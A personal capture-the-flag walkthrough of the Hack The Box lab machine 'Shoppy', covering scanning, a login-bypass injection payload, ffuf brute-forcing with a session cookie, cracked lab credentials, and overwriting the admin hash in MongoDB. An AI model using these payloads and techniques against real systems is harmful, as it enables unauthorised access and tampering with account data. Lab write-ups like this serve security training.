Shoppy

Personal Rating: Easy

Enumeration:

sudo nmap -sC -sV -O -v -Pn 10.10.11.180

22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.23.1
No exact OS matches for host
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• There is a login page at http://shoppy.htb/login

• Trying default creds didnt work

• Trying a simple SQLi the Server give a 504, which is interesting

• I tried fuzzing for more parameters at http://shoppy.htb/login? but couldnt find more

• I ran a rather aggressive sqlmap scan with no results

Command Injection Authentication Bypass

In the end there was a simple injection to be found at the login page:

admin'||'a==a

I found the url http://shoppy.htb/admin/search-users and under /exports/export-search.json there were credentials:

Insecure API

I started a bruteforce for other users here just in case

ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
-H "Cookie: connect.sid=s%3AENsO75kQ4ryZ2yvFvoLxcrA2jll5q3_7.DKXEW1aDd2tJJDOeLiDOX1WXzKhSBjJmQl8yIHCL%2FJ4"
-u http://shoppy.htb/admin/search-users?username=FUZZ
-fs 2561

That was worth it as I found the user josh with 6ebcea65320589ca4f2f1ce039975995. I could have used the payload from before to get all users, which I noticed later

I enumerated for any subdomains or other vhosts:

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
-H "Host: FUZZ.shoppy.htb"
-u http://shoppy.htb
-fs 169

Chat at a Subdomain

I actually found mattermost.shoppy.htb

After bruteforcing the hash of josh I could log in there with josh:remembermethisway

There was an interesting text channel

In one of the channels I found working ssh creds jaeger:Sh0ppyBest@pp!

• Docker should be used for the deploy machine these credentials are for

• I could ssh onto the machine with the creds of jaeger

• There are the users with console jaeger, mattermost, postgres and deploy

• According to LinPeas the machine is vulnerable to CVE-2022-0847, which is a priv esc exploit

• sudo -u deploy /home/deploy/password-manager works, so I might get the creds for the deploy user

• There were some interesting files:

/home/jaeger/.nvm/versions/node/v18.6.0/bin in in the path
/home/jaeger/ShoppyApp/node_modules/enquirer/lib/prompts/password.js
/home/jaeger/ShoppyApp/node_modules/mongodb/lib/cmap/auth/
/home/jaeger/ShoppyApp/node_modules/mongoose/node_modules/mongodb/lib/cmap/auth/

home/jaeger/ShoppyApp/index.js

MongoDB Access

The last of which contained the mongodb creds DJ7aAdnkCZs9DZWx

I connected to the local mongodb that I found in the index js:

{ "_id" : ObjectId("62db0e93d6d6a999a66ee67a"), "username" : "admin", "password" : "23c6877d9e2b564ef8b32c3a23de27b2" }
{ "_id" : ObjectId("62db0e93d6d6a999a66ee67b"), "username" : "josh", "password" : "6ebcea65320589ca4f2f1ce039975995" }

I did not find the admin hash decrypt, but I changed the hash, so the password for admin is also “remembermethisway”:

db.users.update({"_id" : ObjectId("62db0e93d6d6a999a66ee67a")},{$set: { "password" : "6ebcea65320589ca4f2f1ce039975995" }});